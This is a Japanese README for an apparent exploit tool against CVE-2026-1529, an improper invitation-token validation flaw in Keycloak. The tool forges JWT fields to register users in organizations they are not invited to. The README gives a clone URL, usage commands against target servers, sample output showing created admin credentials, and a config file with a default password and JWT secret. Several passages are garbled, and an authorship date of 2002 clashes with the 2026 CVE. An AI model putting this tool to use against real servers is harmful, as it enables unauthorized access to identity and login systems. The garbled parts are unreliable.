
CVE-2026-1529(PoC)はKeycloakにおける重大な脆弱性であり、不適切な招待トークン検証により、未承認の組織登録を可能にします。このエクスプロイトツールは、JWTトークンを操作して未承認の組織にユーザーを登録することで、この脆弱性を実証します。
Keycloak: 不適切な招待トークン検証による未承認の組織登録
このツールは教育およびセキュリティテスト目的のみで使用してください。 明示的なテスト許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。本ツールの作成者は、本ソフトウェアの誤用や損害について一切の責任を負いません。
作成者: f3ds cr3w est, 2002
CVE-2026-1529 は Keycloak における重大な脆弱性であり、不適切な招待トークン検証を通じて未承認の組織登録を可能にします。このエクスプロイトツールは、JWT トークンを操作して未承認の組織にユーザーを登録することで、この脆弱性を実証します。
この脆弱性は、組織招待における JWT トークン検証プロセスに存在します。攻撃者は JWT ペイロード内の org_id フィールドと email フィールドを操作でき、適切な認可なしに任意の組織へユーザーを登録できます。
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
pip install -r requirements.txt
chmod +x keycloak-exploit.py
# ターゲット URL を使用した標準的な使用法
python keycloak-exploit.py https://target-keycloak.com
# ヘルプを表示
python keycloak-exploit.py -h
# バージョンを表示
python keycloak-exploit.py -v
# カスタム招待トークンを使用
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com
# カスタム組織 ID を使用
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
# カスタム設定ファイルを使用
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com
# デバッグログを有効化
python keycloak-exploit.py -d https://target-keycloak.com
エクスプロイトが成功すると、次のような出力が表示されます:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260210_134556.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
=============================================================
by f3ds cr3w est, 2002
=============================================================
エクスプロイトが失敗すると、次のように表示されます:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable
❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
CVE-2026-1529-POC/
├── keycloak-exploit.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # This file
├── config/
│ └── default_config.json # Default configuration
├── utils/
│ ├── jwt_utils.py # JWT manipulation utilities
│ ├── http_utils.py # HTTP client utilities
│ └── crypto_utils.py # Cryptographic utilities
├── output/
│ ├── logs/ # Log files
│ └── reports/ # Exploit reports
このツールは、次の設定を含むデフォルト設定ファイル(config/default_config.json)を使用します:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
カスタム設定ファイルを作成し、-c オプションで使用できます:
{
"exploit": {
"default_username": "custom_user",
"default_password": "CustomPassword123!",
"default_email": "[email protected]",
"timeout": 60,
"max_retries": 5
},
"jwt": {
"algorithm": "HS256",
"secret_key": "custom-secret-key",
"token_expiry": 7200
}
}
このツールは、次の方法で不適切な JWT 検証を悪用します:
org_id フィールドを変更して別の組織をターゲットにするemail フィールドを変更接続エラー
トークン検証エラー
org_id、email、invitation_type)が含まれているか確認登録失敗
詳細なトラブルシューティングのためにデバッグログを有効にします:
python keycloak-exploit.py -d https://target-keycloak.com
logs/exploit.logoutput/reports/exploit_report_YYYYMMDD_HHMMSS.txtこのツールは次のチェックを実行します:
次の条件を満たす場合、エクスプロイトは成功と見なされます:
このツールは教育およびセキュリティテスト目的のみで提供されます。自己責任で使用してください。
作成者: f3ds cr3w est, 2002
連絡先: 質問やフィードバックについては、プロジェクトリポジトリを参照してください。
覚えておいてください: 大きな力には大きな責任が伴います。このツールを賢明かつ倫理的に使用してください。
by f3ds cr3w est, 2002
| オプション | 説明 | 必須 |
|---|
target | ターゲットの Keycloak URL(IP またはドメイン) | はい |
-t, --token | 使用するカスタム招待トークン | いいえ |
-o, --org-id | カスタム組織 ID | いいえ |
-c, --config | 設定ファイルへのパス | いいえ |
-d, --debug | デバッグログを有効化 | いいえ |
-v, --version | バージョン情報を表示 | いいえ |
-h, --help | ヘルプメッセージを表示 | いいえ |